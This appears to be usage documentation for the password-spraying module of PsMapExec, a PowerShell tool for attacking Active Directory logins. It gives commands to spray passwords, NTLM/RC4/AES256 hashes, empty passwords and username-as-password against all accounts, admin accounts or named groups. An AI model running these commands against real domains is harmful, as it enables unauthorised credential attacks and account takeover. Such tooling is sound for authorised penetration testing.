The spray module provides different password spraying techniques. PsMapExec takes into account the default domain policy's account lockout threshold to prevent user account lockouts. However, it does not consider fine-grained password policies. It's advisable to assess whether such policies are in place within the environment to avoid potentially locking out a significant number of user accounts.
.png)
When using the Spray method -Targets parameter can be provided. Specifying "all" we spray all enabled user accounts in the domain. Otherwise, any other value will be treated as a group name. When -Targets is omitted, PsMapExec will spray all enabled active directory accounts.
PsMapExec -Method Spray # Sprays all
PsMapExec -Method Spray -Targets all # Sprays all
PsMapExec -Method Spray -Targets "C:\Users.txt" # Sprays users from list (SamAccountNames)
PsMapExec -Method Spray -Targets "AdminCount=1" # Sprays targets with AdminCount=1
PsMapExec -Method Spray -Targets "Group Name" # Sprays members of groupHash authentication supports RC4/NT, NTLM and AES256 hashes
PsMapExec -Method Spray -SprayHash [RC4]
PsMapExec -Method Spray -SprayHash [AES256]
PsMapExec -Method Spray -SprayHash [NTLM]PsMapExec -Method Spray -SprayPassword [Password]Sets the password to the username value. This switch will also attempt to authenticate as computer accounts to identify any that might be current or legacy Pre-Windows 2000 Compatible Computers.
PsMapExec -Method Spray -AccountAsPasswordAuthentication attempts are performed with empty password values.
PsMapExec -Method Spray -EmptyPasswordDisplays only successful authentication attempts.
PsMapExec -Method Spray -SprayPassword Password123! -SuccessOnly